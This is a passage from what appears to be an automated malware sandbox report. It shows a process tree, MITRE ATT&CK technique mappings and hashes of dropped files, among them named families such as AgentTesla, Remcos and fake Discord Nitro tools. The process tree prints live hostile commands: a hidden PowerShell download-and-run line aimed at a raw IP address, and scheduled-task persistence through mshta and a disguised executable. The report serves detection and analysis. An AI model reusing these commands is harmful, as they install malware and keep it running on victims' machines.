        PID:1496
    - - C:\Program Files (x86)\Internet Explorer\iexplore.exe
        
        "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
        5⤵
        
        PID:7860
- C:\Users\Admin\AppData\Local\Temp\Totally A Safe File.exe
  "C:\Users\Admin\AppData\Local\Temp\Totally A Safe File.exe"
  2⤵
  PID:2012
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c schtasks /create /tn 64E4EmaQVIE /tr "mshta C:\Users\Admin\AppData\Local\Temp\B045IQ5JA.hta" /sc minute /mo 25 /ru "Admin" /f
    3⤵
    PID:2496
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /tn 64E4EmaQVIE /tr "mshta C:\Users\Admin\AppData\Local\Temp\B045IQ5JA.hta" /sc minute /mo 25 /ru "Admin" /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:6576
- - C:\Windows\SysWOW64\mshta.exe
    mshta C:\Users\Admin\AppData\Local\Temp\B045IQ5JA.hta
    3⤵
    PID:4424
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'HO5JBUF5C0OOFSYHFVYDPLMLYNKBKYUK.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:6920
    - - C:\Users\Admin\AppData\Local\TempHO5JBUF5C0OOFSYHFVYDPLMLYNKBKYUK.EXE
        
        "C:\Users\Admin\AppData\Local\TempHO5JBUF5C0OOFSYHFVYDPLMLYNKBKYUK.EXE"
        5⤵
        
        PID:5784
      - C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
        6⤵
        
        PID:1608
        
        C:\Users\Admin\AppData\Local\Temp\10325120101\RTH4oNP.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10325120101\RTH4oNP.exe"
        7⤵
        
        PID:3392
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        8⤵
        
        PID:6480
        
        C:\Users\Admin\AppData\Local\Temp\10329270101\qWvzIGs.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10329270101\qWvzIGs.exe"
        7⤵
        
        PID:8856
        
        C:\Users\Admin\AppData\Local\Temp\10331730101\U0nqzpy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10331730101\U0nqzpy.exe"
        7⤵
        
        PID:3612
        
        C:\Users\Admin\AppData\Local\Temp\10332250101\p2N9nZJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10332250101\p2N9nZJ.exe"
        7⤵
        
        PID:8328
- C:\Users\Admin\AppData\Local\Temp\putty.exe
  "C:\Users\Admin\AppData\Local\Temp\putty.exe"
  2⤵
  PID:4748
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\3B9F.tmp\putty.bat" "C:\Users\Admin\AppData\Local\Temp\putty.exe""
    3⤵
    PID:6392
- C:\Users\Admin\AppData\Local\Temp\TrollRAT.exe
  "C:\Users\Admin\AppData\Local\Temp\TrollRAT.exe"
  2⤵
  PID:4656
- C:\Users\Admin\AppData\Local\Temp\Unconfirmed 78105.crdownload.exe
  "C:\Users\Admin\AppData\Local\Temp\Unconfirmed 78105.crdownload.exe"
  2⤵
  PID:2732
- C:\Users\Admin\AppData\Local\Temp\Josh Bogler.exe
  "C:\Users\Admin\AppData\Local\Temp\Josh Bogler.exe"
  2⤵
  PID:3368

C:\Users\Admin\AppData\Local\Temp\psychosomatic.RAT.exe
C:\Users\Admin\AppData\Local\Temp\psychosomatic.RAT.exe C:\Users\Admin 0
1⤵
PID:1748

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x46c 0x2f8
1⤵
PID:3948

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 3524 -ip 3524
1⤵
PID:4824

C:\Windows\SysWOW64\sysjdgm.exe
C:\Windows\SysWOW64\sysjdgm.exe
1⤵
PID:5640

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 876 -ip 876
1⤵
PID:1188

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 5520 -ip 5520
1⤵
PID:5496

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 796 -ip 796
1⤵
PID:5604

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:6112

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 5520 -ip 5520
1⤵
PID:5724

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 5520 -ip 5520
1⤵
PID:6888

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4836 -ip 4836
1⤵
PID:5392

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 5520 -ip 5520
1⤵
PID:6404

C:\Program Files\taskhostw.exe
"C:\Program Files\taskhostw.exe"
1⤵
PID:6624
- C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Discord" /tr "C:\Users\Admin\AppData\Local\Discord.exe"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:8040

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4436 -ip 4436
1⤵
PID:7972

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
PID:4864

C:\Users\Admin\AppData\Local\Discord.exe
C:\Users\Admin\AppData\Local\Discord.exe
1⤵
PID:6840

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
1⤵
PID:6600
- C:\Windows\SysWOW64\AtBroker.exe
  "C:\Windows\SysWOW64\AtBroker.exe"
  2⤵
  PID:5716

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
1⤵
PID:9024

C:\Windows\SysWOW64\fontdrvhost.exe
"C:\Windows\System32\fontdrvhost.exe"
1⤵
PID:6892

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Replication Through Removable Media

T1091

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Accessibility Features

T1546.008

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Accessibility Features

T1546.008

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Replication Through Removable Media

T1091

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Hdlharas\dlrarhsiva.exe

Filesize
9.1MB

MD5
64261d5f3b07671f15b7f10f2f78da3f

SHA1
d4f978177394024bb4d0e5b6b972a5f72f830181

SHA256
87f51b4632c5fbc351a59a234dfefef506d807f2c173aac23162b85d0d73c2ad

SHA512
3a9ff39e6bc7585b0b03f7327652e4c3b766563e8b183c25b6497e30956945add5684f1579862117e44c6bac2802601fc7c4d2a0daa1824f16c4da1fd6c9c91a

Download Submit
C:\ProgramData\Hdlharas\mdkhm.zip

Filesize
56KB

MD5
b635f6f767e485c7e17833411d567712

SHA1
5a9cbdca7794aae308c44edfa7a1ff5b155e4aa8

SHA256
6838286fb88e9e4e68882601a13fa770f1b510a0a86389b6a29070a129bf2e5e

SHA512
551ba05bd44e66685f359802b35a8c9775792a12844906b4b53e1a000d56624c6db323754331c9f399072790991c1b256d9114a50fb78111652a1c973d2880af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\2020.exe.log

Filesize
507B

MD5
8cf94b5356be60247d331660005941ec

SHA1
fdedb361f40f22cb6a086c808fc0056d4e421131

SHA256
52a5b2d36f2b72cb02c695cf7ef46444dda73d4ea82a73e0894c805fa9987bc0

SHA512
b886dfc8bf03f8627f051fb6e2ac40ae2e7713584695a365728eb2e2c87217830029aa35bd129c642fa03dde3f7a7dd5690b16248676be60a6bb5f497fb23651

Download Submit
C:\Users\Admin\AppData\Local\TempHO5JBUF5C0OOFSYHFVYDPLMLYNKBKYUK.EXE

Filesize
1.8MB

MD5
696453437e6773282de550e8d399f37d

SHA1
f78a5000450bfa160aae29e05fabeefba4a17039

SHA256
f9478fdd8cf5ebee063dce79492d49ea544d263350a8b8a617c820b1a5cd02c5

SHA512
ef5f0b21118387e6eaa65e9808aa70e1f97052ed4eb0a4842fd91172d7d5fe3fc4c08f03762179db263a9a5ece539c0d97a35ae6d2de626527f81cea66cceac5

Download Submit
C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe

Filesize
8KB

MD5
69994ff2f00eeca9335ccd502198e05b

SHA1
b13a15a5bea65b711b835ce8eccd2a699a99cead

SHA256
2e2e035ece4accdee838ecaacdc263fa526939597954d18d1320d73c8bf810c2

SHA512
ced53147894ed2dfc980bcb50767d9734ba8021f85842a53bb4bb4c502d51b4e9884f5f74c4dd2b70b53cafbe2441376675f7bd0f19bb20a3becb091a34fb9f3

Download Submit
C:\Users\Admin\AppData\Local\Temp\0000005d66af8b05750bd3231458a60857425334f7ee2821a627328fb79084d0.exe

Filesize
300KB

MD5
0c5f210d9488d06c6e0143746cb46a4c

SHA1
8c10d61f4fb40acdd99d876c632a3388a9dfbad7

SHA256
0000005d66af8b05750bd3231458a60857425334f7ee2821a627328fb79084d0

SHA512
bb18b8e5e7c6b5e1cb9535c0910a7175f0871b21aab0238cfd3a5fd0a8e79790d457b0ed15b2c5695ba59595d5019975be8ae02eddf1d4c2381b9c1bf43920d4

Download Submit
C:\Users\Admin\AppData\Local\Temp\001eb377f0452060012124cb214f658754c7488ccb82e23ec56b2f45a636c859.exe

Filesize
8.7MB

MD5
799c965e0a5a132ec2263d5fea0b0e1c

SHA1
a15c5a706122fabdef1989c893c72c6530fedcb4

SHA256
001eb377f0452060012124cb214f658754c7488ccb82e23ec56b2f45a636c859

SHA512
6c481a855ee6f81dd388c8a4623e519bfbb9f496dada93672360f0a7476fb2b32fd261324156fd4729cef3cbe13f0a8b5862fe47b6db1860d0d67a77283b5ad8

Download Submit
C:\Users\Admin\AppData\Local\Temp\0E5E23C2_Rar\LoveForyou.scr

Filesize
1.8MB

MD5
789183739b41d876a88e2091b75f0343

SHA1
a2ee6612c3a3eb56848ce9e204acb0d1fba63f6e

SHA256
de095132f160cdb9114dbec3e9fdebfa24277d3daf4adf03ca425022d1299605

SHA512
dd199bcdbde2ad421ae708e15696c7a1ce38e9cfaefa13254c1149d5de163fa346c129da08f8f90d01d57b8afb7578ff7ba0f9458466f4df4ae2c5a001e9d082

Download Submit
C:\Users\Admin\AppData\Local\Temp\0a-PORNOSKI.exe

Filesize
1.6MB

MD5
c14240799b42bb8888028b840d232428

SHA1
e42d3933a959f55983141a568241cd315ae60612

SHA256
0e69c2a9fc7bac1133becbdbcee3d3c48aaece55efa7abd42071009098c29f7b

SHA512
ae515275895c9a741b422c63feea725f150f5b28c1d9da635933a9b1b523d40230d319b1b53ad1a7a27fa39625244862b2ce89e8fc2da7a48303c032bbcfb591

Download Submit
C:\Users\Admin\AppData\Local\Temp\0a77eae3916dbed61916324dbfeefd337b89acc1613b65d3291923caac3955cb_1.exe

Filesize
628KB

MD5
63596f2392855aacd0ed6de194d2677c

SHA1
6c8cf836c5715e21397894c9087b38a740163099

SHA256
0a77eae3916dbed61916324dbfeefd337b89acc1613b65d3291923caac3955cb

SHA512
7204def70b4c68ff229322cbb4c06e9a30a8718af58fdee1c96b2eba6a6fc07b35cbbb88dc00c847a0d7be2a5cd6709c93e73e81988b97907dc6848c66f792b7

Download Submit
C:\Users\Admin\AppData\Local\Temp\0ab8836efcaa62c7daac314e0b7ab1679319b2901578fd9e95ec3476b4c1a732.exe

Filesize
8.7MB

MD5
0263de27fd997a4904ee4a92f91ac733

SHA1
da090fd76b2d92320cf7e55666bb5bd8f50796c9

SHA256
0ab8836efcaa62c7daac314e0b7ab1679319b2901578fd9e95ec3476b4c1a732

SHA512
09ef02532eb7c3a968c1d04bf1f3aa9a4bf400f8485d3be596d7db3aed5f705fc1f85a1f6218397a70830ad747aa03c61b9c5b1cca24c2620cdbb3e5361db194

Download Submit
C:\Users\Admin\AppData\Local\Temp\0f8039360c1d7be25ff412cc1d4e2edbd1841bc0336d675b5877a128d5b0f19d.exe

Filesize
182KB

MD5
64d8b413b2f5f3842e6126b398f62ab5

SHA1
f1c74de5ca76f0feb233ac7b5fb5e0158fb37d79

SHA256
0f8039360c1d7be25ff412cc1d4e2edbd1841bc0336d675b5877a128d5b0f19d

SHA512
328235f69b4db694cfd0e826d0012bb4b9d1f2971a27eec9fd27b106e9a6201a619bdd6ff0cfdad7144ef20276c423bd800ddbc9b5c6cff3c0c37e79837a48cf

Download Submit
C:\Users\Admin\AppData\Local\Temp\10325120101\RTH4oNP.exe

Filesize
1.2MB

MD5
a38b838486743b7473b4e993ef6f7895

SHA1
db8b711f84ea5610b1f3a00c83827c0226b372c9

SHA256
843b982f5fe42f642e0f7a3b1c10cddd1bc0e4072e31d6474aff430ef7977960

SHA512
f38b6fe2e2cda920904e553984298066b24411edaab4f8c7388f24bb590044e08967283910dbe063a56c784c26f7ef580f85d496880c5ed9cb98b4850e968da1

Download Submit
C:\Users\Admin\AppData\Local\Temp\10329270101\qWvzIGs.exe

Filesize
3.7MB

MD5
9b69bfe722972ef8e87a9b713f9dfc9d

SHA1
0de18f00a25702a346ced54b90152afa2003636f

SHA256
b56cea3ef0d518e728c514dbe306a9adb95e62866db0d0c6c3b78af2d869343a

SHA512
a8cdbd0abac994fe82e54c388b8a0ada02b87e48a17fafd470f7d45f385742545034d954a36baf81f9ddb63a6da776b7e78049182956419fb34d33aaa4c8c063

Download Submit
C:\Users\Admin\AppData\Local\Temp\10331730101\U0nqzpy.exe

Filesize
4.9MB

MD5
c909efcf6df1f5cab49d335588709324

SHA1
43ace2539e76dd0aebec2ce54d4b2caae6938cd9

SHA256
d749497d270374cba985b0b93c536684fc69d331a0725f69e2d3ff0e55b2fbc6

SHA512
68c95d27f47eeac10e8500cd8809582b771ab6b1c97a33d615d8edad997a6ab538c3c9fbb5af7b01ebe414ddaeaf28c0f1da88b80fbcb0305e27c1763f7c971a

Download Submit
C:\Users\Admin\AppData\Local\Temp\103b8404dc64c9a44511675981a09fd01395ee837452d114f1350c295357c046.exe

Filesize
8.6MB

MD5
ae747bc7fff9bc23f06635ef60ea0e8d

SHA1
64315e834f67905ed4e47f36155362a78ac23462

SHA256
103b8404dc64c9a44511675981a09fd01395ee837452d114f1350c295357c046

SHA512
e24914a58565a43883c27ae4a41061e8edd3d5eef7b86c1c0e9910d9fbe0eef3e78ed49136ac0c9378311e99901b1847bcfd926aa9a3ea44149a7478480f82b2

Download Submit
C:\Users\Admin\AppData\Local\Temp\1aae7dcfcb679f01938f1bfff990a87ccaaa9b9bed05ff85d64cdc7e925b83ef.exe

Filesize
28KB

MD5
177a73014d3c3455d71d645c1bf32a9f

SHA1
84e6709bb58fd671bbd8b37df897d1e60d570aec

SHA256
1aae7dcfcb679f01938f1bfff990a87ccaaa9b9bed05ff85d64cdc7e925b83ef

SHA512
b11e480a39daae570b44dea17b8929eb8ec6f2bccce1e3aebd9b359a717eb21e7e09750a93ed484ded6073da2527221bda09897fbf5d6c662a14c706a0fec9cb

Download Submit
C:\Users\Admin\AppData\Local\Temp\2020.exe

Filesize
126KB

MD5
dd64540e22bf898a65b2a9d02487ac04

SHA1
30dc0f5fde0feeb409cfb5673d69e9ad7c33f903

SHA256
c3f1f481bf8890ae8e6c4687fc73fb9da1b03e5661f4c0961cdf119dfcd72da4

SHA512
8c496d77574199ebea8e2fe2136d7732013edb1df3de68f3cbc73ec3f36028817d7ac9c7bb068498f6100020a58175efb1a10fd77d14f921e4bca04fd41542a2

Download Submit
C:\Users\Admin\AppData\Local\Temp\5d2514a19b4099f082c344112df843b0bdf48c861c4dd81992758a8c10d38351.exe

Filesize
5.8MB

MD5
26164790286a03dc5abffc3225b59af2

SHA1
1094432026ea3ddb212e4da1ecbe21421ef83319

SHA256
5d2514a19b4099f082c344112df843b0bdf48c861c4dd81992758a8c10d38351

SHA512
148a7878f8ea71d17aa579b0b1d3bf226dc19053bee0da775de66927cb3dfd0b0b7e997652ee53e9ee397477c81e4c71c1aa4fce9d85d08d84bbf4206f59f859

Download Submit
C:\Users\Admin\AppData\Local\Temp\783e538320d6a9f69ac93e74a1296403cd8824596c535f8fc563fbbc21bf362d.exe

Filesize
2.8MB

MD5
3299ebb7b213d7ab79f7fef2296b06d2

SHA1
71efb0ca7eac2410291a6405977aa81bb72394f1

SHA256
783e538320d6a9f69ac93e74a1296403cd8824596c535f8fc563fbbc21bf362d

SHA512
5f5f1e3d45a83cac12f7590a628c1a4f8cbcb84deb4e5c86566778164761c738fefab11a003fee4372121b7545fb26ec7ec2fede0c3ba34470523fdc03ecb996

Download Submit
C:\Users\Admin\AppData\Local\Temp\Adwind.exe

Filesize
5KB

MD5
fe537a3346590c04d81d357e3c4be6e8

SHA1
b1285f1d8618292e17e490857d1bdf0a79104837

SHA256
bbc572cced7c94d63a7208f4aba4ed20d1350bef153b099035a86c95c8d96d4a

SHA512
50a5c1ad99ee9f3a540cb30e87ebfdf7561f0a0ee35b3d06c394fa2bad06ca6088a04848ddcb25f449b3c98b89a91d1ba5859f1ed6737119b606968be250c8ce

Download Submit
C:\Users\Admin\AppData\Local\Temp\AgentTesla.exe

Filesize
2.8MB

MD5
cce284cab135d9c0a2a64a7caec09107

SHA1
e4b8f4b6cab18b9748f83e9fffd275ef5276199e

SHA256
18aab0e981eee9e4ef8e15d4b003b14b3a1b0bfb7233fade8ee4b6a22a5abbb9

SHA512
c45d021295871447ce60250ff9cbeba2b2a16a23371530da077d6235cfe5005f10fa228071542df3621462d913ad2f58236dc0c0cb390779eef86a10bba8429f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Backdoor.Win32.Rbot.aal.exe

Filesize
194KB

MD5
1de4e189f9e847758c57a688553b4f8f

SHA1
1b1580955779135234e4eb3220857e5a8d5168ac

SHA256
c439e919ee06a37656784b922599febcc1d6e2f9a1d43b9ee053e0af345af557

SHA512
9641fd69a2189a26bbf97b725976e3435597bb6a9b90a1404428dc496bb12ef02b8685eea42167f4a340d9e4df622bfb2725e19723b7459856a96aa8a61cd864

Download Submit
C:\Users\Admin\AppData\Local\Temp\CrimsonRAT.exe

Filesize
84KB

MD5
b6e148ee1a2a3b460dd2a0adbf1dd39c

SHA1
ec0efbe8fd2fa5300164e9e4eded0d40da549c60

SHA256
dc31e710277eac1b125de6f4626765a2684d992147691a33964e368e5f269cba

SHA512
4b8c62ddfc7cd3e5ce1f8b5a1ba4a611ab1bfccf81d80cf2cfc831cffa1d7a4b6da0494616a53b419168bc3a324b57382d4a6186af083de6fc93d144c4503741

Download Submit
C:\Users\Admin\AppData\Local\Temp\DISCORD BIRTHDAY NITRO CLAIMER.exe

Filesize
6.6MB

MD5
c108c1c76a3676b39aabbcf8aa9efb69

SHA1
f340b39f41adc4f47c81b990e5fd214043f1dfbc

SHA256
90b04fd7fe0d8ca43c6aa4affcf5c68a6f977ceeeaba8c0cbfcee4e8435ea460

SHA512
b7e9c67956e5be98adfa8d24fabed4a34972d878ccadba5d55d3e974ba86cf4438d1fc951b424e4575a5d41216b4b5437a73148c64987d32d9960fb2195642de

Download Submit
C:\Users\Admin\AppData\Local\Temp\DanaBot.exe

Filesize
2.7MB

MD5
48d8f7bbb500af66baa765279ce58045

SHA1
2cdb5fdeee4e9c7bd2e5f744150521963487eb71

SHA256
db0d72bc7d10209f7fa354ec100d57abbb9fe2e57ce72789f5f88257c5d3ebd1

SHA512
aef8aa8e0d16aab35b5cc19487e53583691e4471064bc556a2ee13e94a0546b54a33995739f0fa3c4de6ff4c6abf02014aef3efb0d93ca6847bad2220c3302bd

Download Submit
C:\Users\Admin\AppData\Local\Temp\DevilRAT.exe

Filesize
104KB

MD5
eb6beba0181a014ac8c0ec040cb1121a

SHA1
52805384c7cd1b73944525c480792a3d0319b116

SHA256
f87b4e7c69ce161743f4b9b0001d7376e163d615ce477c390f63cadf09ffc5d4

SHA512
0afb9a7d180fe017520afb39e954821f77c8b6e2e11bbf73402dcdade231d07f3b755f40606252c917b51a0f5f32d499b96b30e7f2f617c50e709eae4cd80ae4

Download Submit
C:\Users\Admin\AppData\Local\Temp\Discord Free Nitros.exe

Filesize
48KB

MD5
bb48a552c08ce179ad10937fc67b8115

SHA1
65821aa36c874474860e84a436d8a985c7a4df72

SHA256
0b0782bf4aa29ea9e221d4c0f9b477f1ec78b91baa332eed6c6aca830a0d1a4c

SHA512
aceb25c81db39ab8de439b489906e3b46a88219361f39c3124ffa82cbfc03474f682574819b88bb6dea22679bf03ca17caade6111cfc721f21e2ed5de8efa629

Download Submit
C:\Users\Admin\AppData\Local\Temp\Discord Nitro Checker by Unheilgott (1).exe

Filesize
444KB

MD5
0df064a92858ef4d9e5d034d4f23fa7b

SHA1
aed9a8905ddd7296eb394be451a4d72b7d5442b3

SHA256
d1afcd5386c713d7439d6fe2e8c2b2548b4b2c748a6873469daa33dc06c1da8f

SHA512
c35e914428a2f18d2bffc4ee1e9568c62066b48d8f655a9664e27be19a71183c77bc40c2ad39bd5f89e04a774e06caf83daa61a8f80913d6e6f82f3281ba3760

Download Submit
C:\Users\Admin\AppData\Local\Temp\Discord Nitro Generator and Checker.exe

Filesize
153KB

MD5
fc24555ebf5eb87e88af6cacdd39ca66

SHA1
4d7980158375105d3c44ca230aab7963e2461b2b

SHA256
d8b88b1eb850ae1434cf6a489f7376b0a37cb4911f4ea07d10c9613706a1808a

SHA512
74f5ed6eca55f26b5b1c96388fcd72e672313b08f14dba67886de45ef024fd89854f3078e81b4392288345d7057b001a080c1b26246a7d34aac03c34472081bd

Download Submit
C:\Users\Admin\AppData\Local\Temp\EliteMonitor.exe

Filesize
2.3MB

MD5
67b81fffbf31252f54caf716a8befa03

SHA1
3bc8d6941da192739d741dade480300036b6cebd

SHA256
db0e1b302775e21cc57a33730cdc33e7f5bcf408447dcf3e3b012edd7952a95a

SHA512
c1d2ab8820d922cf1e4e5130084ca3b8f2f227309468bebae079456f09bae093479f0e5e188039feb412443541f5cb5b8cc8bd9c203340b06cbd3feafa8747c4

Download Submit
C:\Users\Admin\AppData\Local\Temp\FutureClient.exe

Filesize
750KB

MD5
2fbd63e9262c738c472fdef1f0701d74

SHA1
cf8c1cf97f054d0fba0e5310e4f6c2db3a71d9fe

SHA256
11f601cb5920b195b7b10ea03733acc29b967de302f26efb1736d7b0b270385d

SHA512
ed88e58cca8d9f1d924fb6f6bbbde04139fb61b052fa6b95f312bd46f4d28b01e8bdf18dfa4433571cb2084564e35c1ca36d2e7896f30e05274eedd1f80ba037

Download Submit
C:\Users\Admin\AppData\Local\Temp\Josh Bogler.exe

Filesize
22KB

MD5
2ff5f278eceba92ec6afc38f31a21c08

SHA1
f9b34e6f7f2fb37ced2146108b4e52269a3835be

SHA256
823e831c3f112251b53dfe90ce379200e4129f28d40ef3c25b1bc98b5c347925

SHA512
10b2d1f2a475652b92271fbe44be2221d5a5e1d964e74212d1a39b3ca75721de1b9e7b1b3920cb43bfe31cdec465d5168b91178aa390402980314028e97bbbc1

Download Submit
C:\Users\Admin\AppData\Local\Temp\Lokibot.exe

Filesize
300KB

MD5
f52fbb02ac0666cae74fc389b1844e98

SHA1
f7721d590770e2076e64f148a4ba1241404996b8

SHA256
a885b1f5377c2a1cead4e2d7261fab6199f83610ffdd35d20c653d52279d4683

SHA512
78b4bf4d048bda5e4e109d4dd9dafaa250eac1c5a3558c2faecf88ef0ee5dd4f2c82a791756e2f5aa42f7890efcc0c420156308689a27e0ad9fb90156b8dc1c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\NetWire.exe

Filesize
1.2MB

MD5
7621f79a7f66c25ad6c636d5248abeb9

SHA1
98304e41f82c3aee82213a286abdee9abf79bcce

SHA256
086d35f26bd2fd886e99744960b394d94e74133c40145a3e2bc6b3877b91ec5d

SHA512
59ffcf6eeac00c089e9c77192663d0dc97b2e62cedb6d64fe7dc2e67499abc34e33977e05113c9d39ca6d3e37e8b5c3e6aa926c8526215808b147c0152f7dbfd

Download Submit
C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe

Filesize
761KB

MD5
c6040234ee8eaedbe618632818c3b1b3

SHA1
68115f8c3394c782aa6ba663ac78695d2b80bf75

SHA256
bb459869e5ef6d6dd6f0329080d7cb12542c4b37163ae2cd782620adcd7d55a0

SHA512
a3d8c8c6a990797a99887e0e07a01b1e2fe0a4e53df7294fed18a1e856d56a7762e0ab4a8e4689de411acb4fd29b8d7e247fbc696d855a9976a760d33ab60bcf

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\RuntimeBroker.exe

Filesize
337KB

MD5
db08740474fd41e2a5f43947ee5927b8

SHA1
dd57e443d85155ba76144c01943e74f3d0f5cf95

SHA256
4da1c19a7cdd07363b2b929212718241ef4f8f54e66e206c8c64e5e801603711

SHA512
4690f10aa0d5404146ba2989d89fc199b5e0589af21243359851c2a6b50e09d4f078065224afe93a870a7c4c48eddafde72b4acf097a30fad644a983a4d721c1

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX1\ForYou.exe

Filesize
1.1MB

MD5
a4c8c27672e3bc5ec8927bc286233316

SHA1
381765ead6a38a4861fb2501f41266cb51ca949a

SHA256
fe80a9840598a276f604d2c97c588b66dd81ae21531474e713bead2833a37084

SHA512
e78b351606462b5f52bff7445fcbc6f6c7ea9082b52881dead20297594edc9005820ef6fd2685265f3d112bbead2553f44da3551480b99811641e2c052788bfe

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX1\love.exe

Filesize
531KB

MD5
331407eb1cd5dbdcf9cee0a5ebca9f07

SHA1
e8f3de98b17ab4b5436db96fe3c2c71c2c1b37e4

SHA256
51829cb21ec416ec0338cd411a191b37bb6b3b598c3d556cad1e6f172c8ff365

SHA512
60ee09cfd4e42d49d5e1df61818b9218e1dcee8bc1a41c72c7b7fafabb6dafa850ff0448a1bbf1d8cdb2451203b4ff8146339477d93d6a0309730a860ce692f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\Remcos.exe

Filesize
92KB

MD5
fb598b93c04baafe98683dc210e779c9

SHA1
c7ccd43a721a508b807c9bf6d774344df58e752f

SHA256
c851749fd6c9fa19293d8ee2c5b45b3dc8561115ddfe7166fbaefcb9b353b7c4

SHA512
1185ffe7e296eaaae50b7bd63baa6ffb8f5e76d4a897cb3800cead507a67c4e5075e677abdbf9831f3f81d01bdf1c06675a7c21985ef20a4bae5a256fd41cc0f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Spare.wmv.bat

Filesize
24KB

MD5
237136e22237a90f7393a7e36092ebbe

SHA1
fb9a31d2fe60dcad2a2d15b08f445f3bd9282d5f

SHA256
89d7a9aaad61abc813af7e22c9835b923e5af30647f772c5d4a0f6168ed5001f

SHA512
822de2d86b6d1f7b952ef67d031028835604969d14a76fc64af3ea15241fdb11e3e014ddd2cd8048b8fc01a416ca1f7ccc54755cb4416d14bbdfe8680e43bd41

Download Submit
C:\Users\Admin\AppData\Local\Temp\SteamOBrute.exe

Filesize
803KB

MD5
e38e580f94d77c830a0dcc7e2213d414

SHA1
de119aa09485d560d2667c14861b506940a744c9

SHA256
a98a0f0fccc2ec41816eb90f66528211f6d9eeb125e0587b6ce2003eded1531e

SHA512
3a35fd9bff863c339dfdf704a42564f6a8e1766b5f8219c2232493a6d6374214b982a617ea0c9736c673322120deb2e1a4ffe5be4ec3008466d09f60457586da

Download Submit
C:\Users\Admin\AppData\Local\Temp\TEAM BLUE CLIENT.exe

Filesize
126KB

MD5
5a6ef8ac2a1c241a538f70c399ce6c5e

SHA1
856a753a699a12986ecbcccf5a7929cb429a6a2f

SHA256
1b904ced16d1c60d7169b06e1b1a1bf1b794c47b3650654d89ad21b643c9ccea

SHA512
b131649c031f28c352561d0fe88ef443322f1366fdcc18ecc01c966498be582947fc9266b7d10415a9660144bcb0093ba81013d8dd2aea0aab7ece9f54e29f51

Download Submit
C:\Users\Admin\AppData\Local\Temp\Totally A Safe File.exe

Filesize
938KB

MD5
